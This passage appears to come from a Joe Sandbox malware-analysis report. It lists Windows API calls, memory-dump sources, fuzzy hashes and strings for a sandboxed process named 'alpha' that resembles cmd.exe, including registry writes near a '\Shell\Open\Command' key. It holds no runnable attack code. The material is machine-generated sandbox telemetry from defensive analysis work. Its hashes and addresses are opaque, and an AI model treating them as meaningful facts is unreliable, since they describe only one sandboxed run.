                                        • Part of subcall function 00007FF755CA4FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA5030
                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CCDDB0
                                        • Part of subcall function 00007FF755CA59E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA5A2E
                                        • Part of subcall function 00007FF755CA59E4: _open_osfhandle.MSVCRT ref: 00007FF755CA5A4F
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CCDDEB
                                      • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CCDDFA
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CCE204
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CCE223
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CCE242
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                      • String ID: %9d$%s$~
                                      • API String ID: 3651208239-912394897
                                      • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                      • Instruction ID: 927043449338169684cb2c71ffaf063cfcd9e3a02526d9923669870d168266c4
                                      • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                      • Instruction Fuzzy Hash: 8742A1BBA0868386EB61BF20D8512FDB7A0FB85B48F981136D65D47A95DF3CE940C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                      • String ID: COPYCMD$\
                                      • API String ID: 3989487059-1802776761
                                      • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                      • Instruction ID: 7a91b88dea6762752f924eb89addf605d832fac9fb2802f265ad5cacd290dd44
                                      • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                      • Instruction Fuzzy Hash: 8CF1B4ABB0878781EA50BB15D4142BAE7A1FF45F8CF889535CA4E47B94EE3CE445C310
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Time$File$System$FormatInfoLocalLocale
                                      • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                      • API String ID: 55602301-2548490036
                                      • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                      • Instruction ID: 12b7e2f1342f68dbec814eb5a48beebcd3db17deb666763437c86b24525751b7
                                      • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                      • Instruction Fuzzy Hash: D5A1A4BBA1864396EB10AB10E4401BAF7A5FB85F68FD80135DA4E47694EF3CE944C720
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                      • String ID:
                                      • API String ID: 3935429995-0
                                      • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                      • Instruction ID: 87d5fd65d835c389344bd55e9508839c923bcd0dcdcc658c0974e639627d41ef
                                      • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                      • Instruction Fuzzy Hash: F461937BA1869386E790AF22A404679FBA4FF89F58F899135DE4A83790DF3CD4418710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                      • Instruction ID: bbfa3a3942b03fb88a342381d9f8cac5ce983619bf88901f44ef260712c7268b
                                      • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                      • Instruction Fuzzy Hash: A291E3BBA0868386EB64AF25D8102F9B6A0FB48F4DF885135DA5E46794EF3CD545C320
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _get_osfhandlememset$wcschr
                                      • String ID: DPATH
                                      • API String ID: 3260997497-2010427443
                                      • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                      • Instruction ID: 7a28618f47cd2460a05ca917c9659b960a373131c34f9a463f769bceb2e8d702
                                      • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                      • Instruction Fuzzy Hash: 76D18EBBA0864386EA14AB65D4401BDA6A1FF84FACFC84635DA1D477D5DF3CE841C360
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                      • String ID: @P
                                      • API String ID: 1801357106-3670739982
                                      • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                      • Instruction ID: 9487f712fd1638de1d168626e1fe5d6c134ce2fceb121b487cfa6feac9ed0395
                                      • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                      • Instruction Fuzzy Hash: 53414D77B04A82DAE710AF60E4403EDBBA0FB89B5CF885235DA1D53A88DF78D505C760
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$BufferConsoleInfoScreen
                                      • String ID:
                                      • API String ID: 1034426908-0
                                      • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                      • Instruction ID: 193145b707c10f73b67f6362c5f895428b69949868a30531b33e6f607f9ee92b
                                      • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                      • Instruction Fuzzy Hash: ADF1C2BBA0878389EB64EB21D8402E9ABA4FF45F4CF889530DA5E47695DF3CE544C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseValue$CreateDeleteOpen
                                      • String ID: %s=%s$\Shell\Open\Command
                                      • API String ID: 4081037667-3301834661
                                      • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                      • Instruction ID: 22515b58f381023e79289351375e879886f8d9be901fe11f66c215b039c6481d
                                      • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                      • Instruction Fuzzy Hash: 4771F4ABB1978382EB50AB15E8542B9E2A0FF85F98FC85535DE5E07B84DF3CD4418720
                                      APIs
                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAA85
                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAACF
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAAEC
                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCAB39
                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCAB6F
                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCABA4
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCABCB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseDeleteValue$CreateOpen
                                      • String ID: %s=%s
                                      • API String ID: 1019019434-1087296587
                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                      • Instruction ID: 06d47f305885bbba12c6486de8bbf13b6ca01b7b141c232c4317ce6e08b46718
                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                      • Instruction Fuzzy Hash: 4F51EAB7B1878386E760AB25E85477AF6E1FB89F44F885230CA5D83B94DF78D4418710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmpwcsrchr
                                      • String ID: COPYCMD
                                      • API String ID: 2429825313-3727491224
                                      • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                      • Instruction ID: aaeffb09b28b9758e9704bddbb5ccb7e6f147232475f4c7bbe824963b5a92faa
                                      • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                      • Instruction Fuzzy Hash: 3FF1AFABF0865386FB60AF60D0401BDA6A1EB44F9CFC85635CE5E266D4DF3CA941C760
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$FullNamePathwcsrchr
                                      • String ID:
                                      • API String ID: 4289998964-0
                                      • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                      • Instruction ID: 2bc3dc30813f671f8d3d0ba32f3f60f20a57944b64d7716b4676c0e0c261bc94
                                      • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                      • Instruction Fuzzy Hash: 1EC1E5ABB0974782EA94BB91D548379E7A0FB45F98F886530CE5E037D0DF7CA4918320
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                      • String ID:
                                      • API String ID: 3476366620-0
                                      • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                      • Instruction ID: 4b5c35e20b1d7a49e63ab859cdb1ffa9c9b39e5487c71b98c03ed55bf13c13cd
                                      • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                      • Instruction Fuzzy Hash: 052121BBD0868396EA547B60E4152BCEB50FF4AF2DFCC5275C56E422E5DF3CA4058620
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                      • String ID: %9d
                                      • API String ID: 1006866328-2241623522
                                      • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                      • Instruction ID: 1167753bfe2f3552742ccce1a8628f201e560d11848c6596a5e4594c3a951e11
                                      • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                      • Instruction Fuzzy Hash: 4F5160FBA086438AE700EB51D8501A8BBA0FB44F6CF884639DA2D57795CF7CE5458B60
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                      • Instruction ID: 12c2a56faa528bd65345bb56ff2582af1ef2cae5551bf643164245f26c8165f7
                                      • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                      • Instruction Fuzzy Hash: A8C1D4BBA0968386EB64EB10E8506BDA7A0FB94B9CF884535DA5E07791DF3CD541C310
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                      • Instruction ID: 967b25df4018bd5ba89fa37a7ef76610aa3c9f2aced7623c9551ac6d21b1eff6
                                      • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                      • Instruction Fuzzy Hash: 5FA1B2ABA0868386EB60BB15E452679ABE1FF84F98FC84535DD4E47791DF3CE4018720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$DiskFreeSpace
                                      • String ID: %5lu
                                      • API String ID: 2448137811-2100233843
                                      • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                      • Instruction ID: 51ed836a159ce7297225919ad3cd475fd64b3711cad40564168c02ce6d5b9856
                                      • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                      • Instruction Fuzzy Hash: 624182BB708AC285EB61EF51E8506EAB760FB84B88F889035DA4D4B748DF7CD549C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: GeToken: (%x) '%s'
